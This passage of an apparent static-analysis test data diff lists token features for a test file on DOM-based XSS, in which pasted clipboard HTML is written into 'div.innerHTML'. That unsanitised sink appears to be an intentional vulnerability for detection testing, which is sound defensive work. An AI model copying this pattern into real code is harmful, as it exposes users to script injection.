text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:11:46:24 | preventDefault | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:46:11:46:24 | preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:17 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:17 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:17 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:17 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:17 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div = d ... ('div') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div = d ... ('div') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div = d ... ('div') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div = d ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:15:48:49 | div = d ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:28 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:28 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:28 | document | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:28 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:28 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:42 | documen ... Element | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:42 | documen ... Element | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:42 | documen ... Element | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:42 | documen ... Element | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:42 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | documen ... ('div') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | documen ... ('div') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | documen ... ('div') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | documen ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | exceptional return of documen ... ('div') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | exceptional return of documen ... ('div') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | exceptional return of documen ... ('div') | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | exceptional return of documen ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:21:48:49 | exceptional return of documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:30:48:42 | createElement | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:30:48:42 | createElement | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:30:48:42 | createElement | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:30:48:42 | createElement | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:48:30:48:42 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12572,12 +94247,103 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:48:44:48:48 | 'div' | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:49:13:49:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:15 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:15 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:15 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:15 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:15 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:25 | div.innerHTML | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:25 | div.innerHTML | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:25 | div.innerHTML | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:25 | div.innerHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:25 | div.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:32 | div.innerHTML = html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:32 | div.innerHTML = html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:32 | div.innerHTML = html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:32 | div.innerHTML = html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:13:50:32 | div.innerHTML = html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:17:50:25 | innerHTML | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:17:50:25 | innerHTML | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:17:50:25 | innerHTML | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:17:50:25 | innerHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:50:17:50:25 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | contextSurroundingFunctionParameters | ()\n(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:50:29:50:32 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:15 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:15 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:15 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:15 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:15 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:27 | div.textContent | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:27 | div.textContent | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:27 | div.textContent | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:27 | div.textContent | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:27 | div.textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:34 | div.tex ... = text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:34 | div.tex ... = text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:34 | div.tex ... = text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:34 | div.tex ... = text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:13:52:34 | div.tex ... = text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:17:52:27 | textContent | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:17:52:27 | textContent | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:17:52:27 | textContent | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:17:52:27 | textContent | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:17:52:27 | textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | assignedToPropName | textContent | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:52:31:52:34 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:16 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:16 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:16 | document | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:16 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:21 | document.body | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:21 | document.body | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:21 | document.body | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:21 | document.body | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:21 | document.body | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:28 | document.body.append | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:28 | document.body.append | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:28 | document.body.append | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:28 | document.body.append | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:28 | document.body.append | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | documen ... nd(div) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | documen ... nd(div) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | documen ... nd(div) | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | documen ... nd(div) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | exceptional return of documen ... nd(div) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | exceptional return of documen ... nd(div) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | exceptional return of documen ... nd(div) | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | exceptional return of documen ... nd(div) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:9:54:33 | exceptional return of documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:18:54:21 | body | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:18:54:21 | body | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:18:54:21 | body | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:18:54:21 | body | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:18:54:21 | body | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:23:54:28 | append | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:23:54:28 | append | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:23:54:28 | append | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:23:54:28 | append | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:54:23:54:28 | append | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | CalleeFlexibleAccessPath | document.body.append | | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12585,11 +94351,292 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | enclosingFunctionBody | div document createElement div div onpaste e ClipboardEvent clipboardData e clipboardData text clipboardData getData text/plain html clipboardData getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/clipboard.ts:54:30:54:32 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:58:0 | this | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:58:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:58:0 | this | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:58:0 | this | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:58:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | 'arguments' object of function getClipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | 'arguments' object of function getClipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | 'arguments' object of function getClipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | 'arguments' object of function getClipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | 'arguments' object of function getClipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | async f ... ms;\\n } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | async f ... ms;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | async f ... ms;\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | exceptional return of function getClipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | exceptional return of function getClipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | exceptional return of function getClipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | exceptional return of function getClipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | exceptional return of function getClipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | return of function getClipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | return of function getClipboardData | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | return of function getClipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | return of function getClipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:1:89:3 | return of function getClipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:16:58:31 | getClipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:16:58:31 | getClipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:16:58:31 | getClipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:58:33:58:33 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML 